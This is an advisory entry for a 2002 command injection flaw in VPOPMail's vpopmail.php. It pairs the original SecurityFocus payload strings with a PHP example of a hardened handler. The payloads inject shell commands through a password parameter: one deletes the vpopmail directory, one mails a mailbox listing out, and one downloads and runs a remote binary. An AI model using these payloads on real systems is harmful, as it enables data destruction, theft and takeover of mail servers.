Vendor: VPOPMail
By: SecurityFocus
CVSS: 8.8 (HIGH)
CWE: 78 (Command Injection)
Product Name: VPOPMail
Affected Version From: VPOPMail 5.2.1
Affected Version To: VPOPMail 5.2.1
Patch Exists: YES
Related CVE: CVE-2002-1390
CPE: a:inter7:vpopmail
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux, Windows
Date: 2002

Command Injection in VPOPMail

VPOPMail is vulnerable to command injection due to insufficient sanitization of user-supplied input. An attacker can manipulate URI parameters to include malicious system commands, which would be executed with the privileges of the web server process.

Mitigation:

Apply the vendor patch (one exists for this issue) and ensure that user-supplied input is strictly validated before it reaches a shell command.

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/7063/info

A vulnerability has been reported for VPOPMail that may allow attackers to execute arbitrary commands on a vulnerable system. The vulnerability exists due to insufficient sanitization of user-supplied input.

As the vpopmail.php script does not properly sanitize the values of some variables, it is possible for an attacker to include malicious system commands by manipulating URI parameters. This would in turn result in the execution of these commands with the privileges of the web server process.

password;~vpopmail/bin/vpasswd user@host password
password;rm -rf ~vpopmail/
password;ls ~vpopmail/domains/example.com/user/Maildir/new| mail user@host
passwd; wget example.com/exploit -O /tmp/f;chmod +x /tmp/f;/tmp/f;
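As an added example (not vpopmail's code; the page does not show the source of vpopmail.php), a PHP reconstruction of the vulnerable pattern the advisory describes beside a hardened handler that allowlists the mailbox and invokes vpasswd without a shell. The vpasswd install path, the parameter names and the password length policy are assumptions.

```php
<?php
// Added example, not vpopmail's own code: a hardened replacement for the pattern
// the advisory describes. The vpasswd path and parameter names are assumptions.
const VPASSWD = '/home/vpopmail/bin/vpasswd'; // assumed install path

// Vulnerable pattern (assumed): handed to /bin/sh, a password value containing
// ';' ends the intended command and starts another, as in the strings above.
function vulnerable_command(string $user, string $domain, string $password): string
{
    return "~vpopmail/bin/vpasswd {$user}@{$domain} {$password}";
}
// Step 1: allowlist the mailbox parts. Rejecting what does not match is more
// durable than stripping ';' and '|' from what does.
function validate_mailbox(string $user, string $domain): bool
{
    return preg_match('/^[a-z0-9._-]{1,64}$/i', $user) === 1
        && preg_match('/^[a-z0-9-]+(\.[a-z0-9-]+)+$/i', $domain) === 1;
}
// Step 2: build an argv array, not a command string. proc_open() with an array
// (PHP >= 7.4) runs the program directly; no shell parses the arguments, so
// metacharacters in $password are just bytes inside one argument.
function vpasswd_argv(string $user, string $domain, string $password): ?array
{
    if (!validate_mailbox($user, $domain)) {
        return null;
    }
    // Length bounds are a local policy choice; control characters are never valid.
    if (strlen($password) < 8 || strlen($password) > 128 || preg_match('/[\x00\r\n]/', $password) === 1) {
        return null;
    }
    return [VPASSWD, "$user@$domain", $password];
}
function set_password(string $user, string $domain, string $password): bool
{
    $argv = vpasswd_argv($user, $domain, $password);
    if ($argv === null) {
        return false;
    }
    $proc = proc_open($argv, [1 => ['pipe', 'w'], 2 => ['pipe', 'w']], $pipes);
    if (!is_resource($proc)) {
        return false;
    }
    fclose($pipes[1]);
    fclose($pipes[2]);
    return proc_close($proc) === 0; // vpasswd's exit status decides success
}
// With the advisory's second string: two shell commands versus one argv entry.
$injected = 'password;rm -rf ~vpopmail/';
var_dump(vulnerable_command('user', 'example.com', $injected), vpasswd_argv('user', 'example.com', $injected));
```

Because the hardened path never builds a shell command line, the injected value is passed to vpasswd as a literal password argument rather than interpreted; the tilde in the original path is a shell feature, which is why the absolute path is used.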